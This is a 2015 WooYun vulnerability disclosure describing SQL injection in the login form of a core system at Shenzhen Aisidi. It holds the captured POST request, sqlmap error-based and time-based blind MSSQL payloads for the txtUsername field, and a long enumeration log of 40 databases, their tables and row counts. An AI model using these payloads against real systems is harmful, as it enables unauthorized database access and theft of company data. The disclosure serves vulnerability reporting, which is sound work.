当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137663

漏洞标题:爱施德某核心系统存在高危SQL注入泄漏大量信息

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-08-31 22:55

修复时间:2015-10-17 09:58

公开时间:2015-10-17 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-09-02: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-12: 细节向核心白帽子及相关领域专家公开
2015-09-22: 细节向普通白帽子公开
2015-10-02: 细节向实习白帽子公开
2015-10-17: 细节向公众公开

简要描述:

深圳市爱施德股份有限公司成立于1998年6月,注册资本999100000元,是一家致力于全球最新移动通讯产品、数码电子产品的引进和推广的上市公司(股票代码:002416)。卓越的运营能力、完善的客户服务确立了公司作为国内外著名品牌在中国核心代理商的地位和渠道服务领域的领先地位。2010年5月28日,公司正式在深圳证券交易所挂牌上市,从此进入一个全新的发展阶段。

详细说明:

http://**.**.**.**/
漏洞地址:

POST / HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 524
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=hbsrotricle1k1s1vffiupge
__VIEWSTATE=%2FwEPDwUKMTAzMzQ2ODc4Mw8WAh4EVk51bQUEODU1MhYEAgMPZBYCAgcPDxYCHghJbWFnZVVybAUaL1ZhbGlkYXRlQ29kZS5hc3B4P3ZtPTg1NTJkZAIFDw9kFgIeA3NyYwUuUVJDb2RlSW1nLzg4MmQ3ZjVjZDk2MzQ3MDM4NDA5NWRiNTBhNDcyNjE3LnBuZ2RkuUwognsmsuguO%2Fj5eNWIRnZznQ%2BzOT9Yfau%2BUdByvfE%3D&__VIEWSTATEGENERATOR=5A2128B1&__EVENTVALIDATION=%2FwEdAAROxw3bFWyN2I7izyc79NNUVK7BrRAtEiqu9nGFEI%2BjB3Y2%2BMc6SrnAqio3oCKbxYaCysx15DoHQO%2Bp6WIO0%2FCMpFr72F0FUI8gkygcs2qj7Lv9HP0X002uxtNsv84AuXo%3D&txtUsername=admin&txtPassword=admin&btnSignin=%E7%99%BB%E5%BD%95


paload:

---
Parameter: txtUsername (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQ2ODc4Mw8WAh4EVk51bQUEODU1MhYEAgMPZBYCAgcPDxYCHghJbWFnZVVybAU
aL1ZhbGlkYXRlQ29kZS5hc3B4P3ZtPTg1NTJkZAIFDw9kFgIeA3NyYwUuUVJDb2RlSW1nLzg4MmQ3ZjVjZDk2MzQ3MDM4NDA5NWR
iNTBhNDcyNjE3LnBuZ2RkuUwognsmsuguO/j5eNWIRnZznQ+zOT9Yfau+UdByvfE=&__VIEWSTATEGENERATOR=5A2128B1&__EV
ENTVALIDATION=/wEdAAROxw3bFWyN2I7izyc79NNUVK7BrRAtEiqu9nGFEI+jB3Y2+Mc6SrnAqio3oCKbxYaCysx15DoHQO+p6W
IO0/CMpFr72F0FUI8gkygcs2qj7Lv9HP0X002uxtNsv84AuXo=&txtUsername=admin'+(SELECT 'sUDM' WHERE 5374=5374
 AND 7692=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (
7692=7692) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113))))+'&t
xtPassword=admin&btnSignin=%E7%99%BB%E5%BD%95
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQ2ODc4Mw8WAh4EVk51bQUEODU1MhYEAgMPZBYCAgcPDxYCHghJbWFnZVVybAU
aL1ZhbGlkYXRlQ29kZS5hc3B4P3ZtPTg1NTJkZAIFDw9kFgIeA3NyYwUuUVJDb2RlSW1nLzg4MmQ3ZjVjZDk2MzQ3MDM4NDA5NWR
iNTBhNDcyNjE3LnBuZ2RkuUwognsmsuguO/j5eNWIRnZznQ+zOT9Yfau+UdByvfE=&__VIEWSTATEGENERATOR=5A2128B1&__EV
ENTVALIDATION=/wEdAAROxw3bFWyN2I7izyc79NNUVK7BrRAtEiqu9nGFEI+jB3Y2+Mc6SrnAqio3oCKbxYaCysx15DoHQO+p6W
IO0/CMpFr72F0FUI8gkygcs2qj7Lv9HP0X002uxtNsv84AuXo=&txtUsername=admin'+(SELECT 'FgSJ' WHERE 5772=5772
 AND 9070=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,
sysusers AS sys5,sysusers AS sys6,sysusers AS sys7))+'&txtPassword=admin&btnSignin=%E7%99%BB%E5%BD%9
5
---
[14:26:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008

漏洞证明:

数据库:

available databases [40]:
[*] Aisidi_Workflow
[*] BI_DataCenter
[*] codii_MSCRM
[*] codii_MSCRM_ADDON
[*] COODOODB
[*] DATA Analysis
[*] desktop
[*] DW_ASDBI
[*] DW_JTBI
[*] DW_NEW
[*] FBM
[*] HRM
[*] K2Categories
[*] K2Dependencies
[*] K2EnvironmentSettings
[*] K2EventBus
[*] K2EventBusScheduler
[*] K2HostServer
[*] K2Server
[*] K2ServerBak
[*] K2ServerLog
[*] K2SmartBox
[*] K2SmartBroker
[*] K2SQLUM
[*] K2WebDesigner
[*] K2WebWorkflow
[*] K2Workspace
[*] master
[*] moa
[*] model
[*] MSCRM_CONFIG
[*] msdb
[*] OA
[*] OAEXP
[*] ReportServer
[*] ReportServerTempDB
[*] SAPBO
[*] tempdb
[*] zkeco_db
[*] zkeco_dblan


[18:31:42] [INFO] fetching database names
[18:31:42] [INFO] the SQL query used returns 40 entries
[18:31:42] [INFO] fetching tables for databases: Aisidi_Workflow, BI_DataCenter, COODOODB, DW_ASDBI,
 DW_JTBI, DW_NEW, FBM, HRM, K2Categories, K2Dependencies, K2EnvironmentSettings, K2EventBus, K2Event
BusScheduler, K2HostServer, K2SQLUM, K2Server, K2ServerBak, K2ServerLog, K2SmartBox, K2SmartBroker,
K2WebDesigner, K2WebWorkflow, K2Workspace, MSCRM_CONFIG, OA, OAEXP, ReportServer, ReportServerTempDB
, SAPBO, [DATA Analysis], codii_MSCRM, codii_MSCRM_ADDON, desktop, master, moa, model, msdb, tempdb,
 zkeco_db, zkeco_dblan
[18:31:42] [INFO] the SQL query used returns 41 entries
[18:31:42] [INFO] the SQL query used returns 3 entries
[18:31:42] [INFO] resumed: dbo._Setting
[18:31:42] [INFO] resumed: dbo.Dependancies
[18:31:42] [INFO] resumed: dbo.DependancyClass
[18:31:42] [INFO] the SQL query used returns 24 entries
[18:31:42] [INFO] the SQL query used returns 4 entries
[18:31:42] [INFO] resumed: dbo._Setting
[18:31:42] [INFO] resumed: dbo.K2Groups
[18:31:42] [INFO] resumed: dbo.K2UserGroup
[18:31:42] [INFO] resumed: dbo.K2Users
[18:31:42] [INFO] the SQL query used returns 23 entries
[18:31:42] [INFO] the SQL query used returns 9 entries
[18:31:42] [INFO] resumed: dbo._Environment
[18:31:43] [INFO] resumed: dbo._EnvironmentLog
[18:31:43] [INFO] resumed: dbo._EnvironmentLogOperations
[18:31:43] [INFO] resumed: dbo._Field
[18:31:43] [INFO] resumed: dbo._FieldTypes
[18:31:43] [INFO] resumed: dbo._FieldValue
[18:31:43] [INFO] resumed: dbo._Plugins
[18:31:43] [INFO] resumed: dbo._Setting
[18:31:43] [INFO] resumed: dbo._Template
[18:31:43] [INFO] the SQL query used returns 72 entries
[18:31:43] [INFO] the SQL query used returns 4 entries
[18:31:43] [INFO] resumed: dbo._Setting
[18:31:43] [INFO] resumed: dbo.RoundRobinSO
[18:31:43] [INFO] resumed: dbo.SB_DataSecurityMapping
[18:31:43] [INFO] resumed: dbo.SmartBoxObject
[18:31:43] [INFO] the SQL query used returns 55 entries
[18:31:43] [INFO] the SQL query used returns 9 entries
[18:31:43] [INFO] resumed: dbo._Setting
[18:31:43] [INFO] resumed: dbo.ebs_ServiceRegister
[18:31:43] [INFO] resumed: dbo.ebs_Status
[18:31:43] [INFO] resumed: dbo.LogScheduleInstance
[18:31:43] [INFO] resumed: dbo.RecurencePattern
[18:31:43] [INFO] resumed: dbo.RecurenceRange
[18:31:43] [INFO] resumed: dbo.RecurenceType
[18:31:43] [INFO] resumed: dbo.Schedule
[18:31:43] [INFO] resumed: dbo.ScheduleInstance
[18:31:43] [INFO] the SQL query used returns 27 entries
[18:31:43] [INFO] the SQL query used returns 177 entries
[18:31:43] [INFO] the SQL query used returns 2 entries
[18:31:43] [INFO] resumed: dbo.爱施德在线2015年上半年订单
[18:31:43] [INFO] resumed: dbo.爱施德在线客户月销量
[18:31:43] [INFO] the SQL query used returns 10 entries
[18:31:43] [INFO] resumed: dbo._Setting
[18:31:43] [INFO] resumed: dbo.Application
[18:31:43] [INFO] resumed: dbo.ApplicationMap
[18:31:43] [INFO] resumed: dbo.AssociationProperties
[18:31:43] [INFO] resumed: dbo.Associations
[18:31:43] [INFO] resumed: dbo.ServiceInstance
[18:31:43] [INFO] resumed: dbo.ServiceObject
[18:31:43] [INFO] resumed: dbo.ServiceType
[18:31:43] [INFO] resumed: dbo.SmartObject
[18:31:43] [INFO] resumed: dbo.SmartObjectJoins
[18:31:43] [INFO] the SQL query used returns 337 entries
[18:31:43] [INFO] the SQL query used returns 13 entries
[18:31:43] [INFO] resumed: dbo._Setting
[18:31:43] [INFO] resumed: dbo.ProcessCode
[18:31:43] [INFO] resumed: dbo.ProcessEvent
[18:31:43] [INFO] resumed: dbo.ProcessFavoriteGroup
[18:31:43] [INFO] resumed: dbo.ProcessFavoriteGroupUser
[18:31:43] [INFO] resumed: dbo.ProcessFavoritesUser
[18:31:43] [INFO] resumed: dbo.ProcessMail
[18:31:43] [INFO] resumed: dbo.ProcessProcessTemplate
[18:31:43] [INFO] resumed: dbo.ProcessProcessTemplateGroup
[18:31:43] [INFO] resumed: dbo.ProcessProcessTemplateGroupTemplate
[18:31:43] [INFO] resumed: dbo.ProcessSharing
[18:31:43] [INFO] resumed: dbo.ProcessTemplate
[18:31:44] [INFO] resumed: dbo.ProcessXML
[18:31:44] [INFO] the SQL query used returns 4 entries
[18:31:44] [INFO] resumed: dbo.DATATABLE
[18:31:44] [INFO] resumed: dbo.DELETETRACKER
[18:31:44] [INFO] resumed: dbo.INDEXTABLE
[18:31:44] [INFO] resumed: dbo.KEYTABLE
[18:31:44] [INFO] the SQL query used returns 481 entries
[18:31:44] [INFO] the SQL query used returns 52 entries
[18:31:44] [INFO] the SQL query used returns 96 entries
[18:31:44] [INFO] the SQL query used returns 364 entries
[18:31:44] [INFO] the SQL query used returns 13 entries
[18:31:44] [INFO] resumed: dbo.ChunkData
[18:31:44] [INFO] resumed: dbo.ChunkSegmentMapping
[18:31:44] [INFO] resumed: dbo.DBUpgradeHistory
[18:31:44] [INFO] resumed: dbo.ExecutionCache
[18:31:44] [INFO] resumed: dbo.PersistedStream
[18:31:44] [INFO] resumed: dbo.Segment
[18:31:44] [INFO] resumed: dbo.SegmentedChunk
[18:31:44] [INFO] resumed: dbo.SessionData
[18:31:44] [INFO] resumed: dbo.SessionLock
[18:31:44] [INFO] resumed: dbo.SnapshotData
[18:31:44] [INFO] resumed: dbo.TempCatalog
[18:31:44] [INFO] resumed: dbo.TempDataSets
[18:31:44] [INFO] resumed: dbo.TempDataSources
[18:31:44] [INFO] the SQL query used returns 65 entries
[18:31:44] [INFO] the SQL query used returns 237 entries
[18:31:44] [INFO] the SQL query used returns 50 entries
[18:31:44] [INFO] the SQL query used returns 40 entries
[18:31:44] [INFO] the SQL query used returns 39 entries
[18:31:44] [INFO] the SQL query used returns 79 entries
[18:31:45] [INFO] the SQL query used returns 45 entries
[18:31:45] [INFO] the SQL query used returns 26 entries
[18:31:45] [INFO] the SQL query used returns 262 entries
[18:31:45] [INFO] the SQL query used returns 55 entries
[18:31:45] [INFO] the SQL query used returns 28 entries
[18:31:45] [INFO] the SQL query used returns 96 entries
[18:31:45] [INFO] the SQL query used returns 90 entries
[18:31:45] [INFO] the SQL query used returns 17 entries
[18:31:45] [INFO] resumed: dbo._Setting
[18:31:45] [INFO] resumed: dbo.ClientRecorderError
[18:31:45] [INFO] resumed: dbo.Config
[18:31:45] [INFO] resumed: dbo.CustomEvent
[18:31:45] [INFO] resumed: dbo.CustomEventInstance
[18:31:45] [INFO] resumed: dbo.eb_Status
[18:31:45] [INFO] resumed: dbo.EventPolicyMapping
[18:31:45] [INFO] resumed: dbo.EventPolicyMappingInstance
[18:31:45] [INFO] resumed: dbo.EventType
[18:31:45] [INFO] resumed: dbo.ExecutableType
[18:31:45] [INFO] resumed: dbo.LogCustomEvent
[18:31:45] [INFO] resumed: dbo.LogCustomEventInstance
[18:31:45] [INFO] resumed: dbo.LogEventPolicyMapping
[18:31:45] [INFO] resumed: dbo.LogEventPolicyMappingInstance
[18:31:45] [INFO] resumed: dbo.PolicyType
[18:31:45] [INFO] resumed: dbo.ServiceRegister
[18:31:45] [INFO] resumed: dbo.SystemGuid
[18:31:45] [INFO] the SQL query used returns 1791 entries
[18:31:46] [INFO] the SQL query used returns 256 entries
[18:31:46] [INFO] the SQL query used returns 5 entries
[18:31:46] [INFO] resumed: dbo._Setting
[18:31:46] [INFO] resumed: dbo.Categories
[18:31:46] [INFO] resumed: dbo.CategoriesData
[18:31:46] [INFO] resumed: dbo.CategoriesDataType
[18:31:46] [INFO] resumed: dbo.CategorySystem
[18:31:46] [INFO] resumed: 5
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 10
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 17
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 178
[18:31:46] [INFO] resumed: 1684132
[18:31:46] [INFO] resumed: 1
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 3
[18:31:46] [INFO] resumed: 14
[18:31:46] [INFO] resumed: 36
[18:31:46] [INFO] resumed: 1
[18:31:46] [INFO] resumed: 5
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 371
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 1
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 1114
[18:31:46] [INFO] resumed: 3
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 1576
[18:31:46] [INFO] resumed: 3560
[18:31:46] [INFO] resumed: 2
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 0
[18:31:46] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 5317
[18:31:47] [INFO] resumed: 6
[18:31:47] [INFO] resumed: 10
[18:31:47] [INFO] resumed: 2
[18:31:47] [INFO] resumed: 1
[18:31:47] [INFO] resumed: 3
[18:31:47] [INFO] resumed: 12
[18:31:47] [INFO] resumed: 1795
[18:31:47] [INFO] resumed: 9
[18:31:47] [INFO] resumed: 3
[18:31:47] [INFO] resumed: 4
[18:31:47] [INFO] resumed: 1395
[18:31:47] [INFO] resumed: 1395
[18:31:47] [INFO] resumed: 4
[18:31:47] [INFO] resumed: 19
[18:31:47] [INFO] resumed: 3
[18:31:47] [INFO] resumed: 1031
[18:31:47] [INFO] resumed: 144
[18:31:47] [INFO] resumed: 4
[18:31:47] [INFO] resumed: 382
[18:31:47] [INFO] resumed: 228
[18:31:47] [INFO] resumed: 784
[18:31:47] [INFO] resumed: 2641
[18:31:47] [INFO] resumed: 4576
[18:31:47] [INFO] resumed: 7
[18:31:47] [INFO] resumed: 254
[18:31:47] [INFO] resumed: 1596
[18:31:47] [INFO] resumed: 1
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 2
[18:31:47] [INFO] resumed: 2
[18:31:47] [INFO] resumed: 6
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 1
[18:31:47] [INFO] resumed: 2
[18:31:47] [INFO] resumed: 2
[18:31:47] [INFO] resumed: 8
[18:31:47] [INFO] resumed: 32
[18:31:47] [INFO] resumed: 20
[18:31:47] [INFO] resumed: 106
[18:31:47] [INFO] resumed: 82
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 1
[18:31:47] [INFO] resumed: 112
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 7
[18:31:47] [INFO] resumed: 1
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 5
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 1
[18:31:47] [INFO] resumed: 6
[18:31:47] [INFO] resumed: 1
[18:31:47] [INFO] resumed: 18
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 1
[18:31:47] [INFO] resumed: 7
[18:31:47] [INFO] resumed: 0
[18:31:47] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 16
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 2
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 18
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 35
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 3
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 8
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 1
[18:31:48] [INFO] resumed: 18
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 2
[18:31:48] [INFO] resumed: 2
[18:31:48] [INFO] resumed: 1
[18:31:48] [INFO] resumed: 149
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 544
[18:31:48] [INFO] resumed: 543
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 543
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 1
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 22
[18:31:48] [INFO] resumed: 2
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 9
[18:31:48] [INFO] resumed: 10
[18:31:48] [INFO] resumed: 18
[18:31:48] [INFO] resumed: 10
[18:31:48] [INFO] resumed: 2
[18:31:48] [INFO] resumed: 1
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 170
[18:31:48] [INFO] resumed: 282
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 299019
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:48] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 13073
[18:31:49] [INFO] resumed: 45
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 21
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 3
[18:31:49] [INFO] resumed: 1
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 185
[18:31:49] [INFO] resumed: 227
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 18
[18:31:49] [INFO] resumed: 112562
[18:31:49] [INFO] resumed: 113115
[18:31:49] [INFO] resumed: 4784182
[18:31:49] [INFO] resumed: 104018
[18:31:49] [INFO] resumed: 8804
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 18
[18:31:49] [INFO] resumed: 1442
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 324
[18:31:49] [INFO] resumed: 30
[18:31:49] [INFO] resumed: 2
[18:31:49] [INFO] resumed: 1
[18:31:49] [INFO] resumed: 18
[18:31:49] [INFO] resumed: 214
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 1
[18:31:49] [INFO] resumed: 104018
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 2
[18:31:49] [INFO] resumed: 5
[18:31:49] [INFO] resumed: 18
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 58
[18:31:49] [INFO] resumed: 1
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 2
[18:31:49] [INFO] resumed: 13
[18:31:49] [INFO] resumed: 18
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 104399
[18:31:49] [INFO] resumed: 113055
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 1
[18:31:49] [INFO] resumed: 2
[18:31:49] [INFO] resumed: 170
[18:31:49] [INFO] resumed: 282
[18:31:49] [INFO] resumed: 11042400
[18:31:49] [INFO] resumed: 8328743
[18:31:49] [INFO] resumed: 5972721
[18:31:49] [INFO] resumed: 5739218
[18:31:49] [INFO] resumed: 8487658
[18:31:49] [INFO] resumed: 6004842
[18:31:49] [INFO] resumed: 5765928
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 0
[18:31:49] [INFO] resumed: 5765933
[18:31:49] [INFO] resumed: 5765941
[18:31:49] [INFO] resumed: 5765925
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 1
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 185
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 8487682
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 324
[18:31:50] [INFO] resumed: 22287540
[18:31:50] [INFO] resumed: 589566
[18:31:50] [INFO] resumed: 8168715
[18:31:50] [INFO] resumed: 4
[18:31:50] [INFO] resumed: 18
[18:31:50] [INFO] resumed: 214
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 2586855
[18:31:50] [INFO] resumed: 5204042
[18:31:50] [INFO] resumed: 118994718
[18:31:50] [INFO] resumed: 19522605
[18:31:50] [INFO] resumed: 2586857
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 13632
[18:31:50] [INFO] resumed: 2
[18:31:50] [INFO] resumed: 36
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 2
[18:31:50] [INFO] resumed: 28
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 104264
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 5
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 2
[18:31:50] [INFO] resumed: 1
[18:31:50] [INFO] resumed: 3
[18:31:50] [INFO] resumed: 1
[18:31:50] [INFO] resumed: 2
[18:31:50] [INFO] resumed: 41
[18:31:50] [INFO] resumed: 33
[18:31:50] [INFO] resumed: 9
[18:31:50] [INFO] resumed: 65
[18:31:50] [INFO] resumed: 13
[18:31:50] [INFO] resumed: 63
[18:31:50] [INFO] resumed: 0
[18:31:50] [INFO] resumed: 2
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 124
[18:32:27] [INFO] resumed: 2
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 10
[18:32:27] [INFO] resumed: 1
[18:32:27] [INFO] resumed: 10
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 10
[18:32:27] [INFO] resumed: 2
[18:32:27] [INFO] resumed: 4
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 3
[18:32:27] [INFO] resumed: 9
[18:32:27] [INFO] resumed: 1
[18:32:27] [INFO] resumed: 2
[18:32:27] [INFO] resumed: 6
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 9
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 2
[18:32:27] [INFO] resumed: 662
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 526
[18:32:27] [INFO] resumed: 642
[18:32:27] [INFO] resumed: 2004
[18:32:27] [INFO] resumed: 856678
[18:32:27] [INFO] resumed: 690018
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 1
[18:32:27] [INFO] resumed: 1
[18:32:27] [INFO] resumed: 1964
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 9047093
[18:32:27] [INFO] resumed: 7297551
[18:32:27] [INFO] resumed: 3859
[18:32:27] [INFO] resumed: 4
[18:32:27] [INFO] resumed: 750239
[18:32:27] [INFO] resumed: 398
[18:32:27] [INFO] resumed: 6905318
[18:32:27] [INFO] resumed: 13994223
[18:32:27] [INFO] resumed: 9897901
[18:32:27] [INFO] resumed: 2499524
[18:32:27] [INFO] resumed: 481767
[18:32:27] [INFO] resumed: 1726957
[18:32:27] [INFO] resumed: 246873
[18:32:27] [INFO] resumed: 0
[18:32:27] [INFO] resumed: 692
[18:32:27] [INFO] resumed: 3
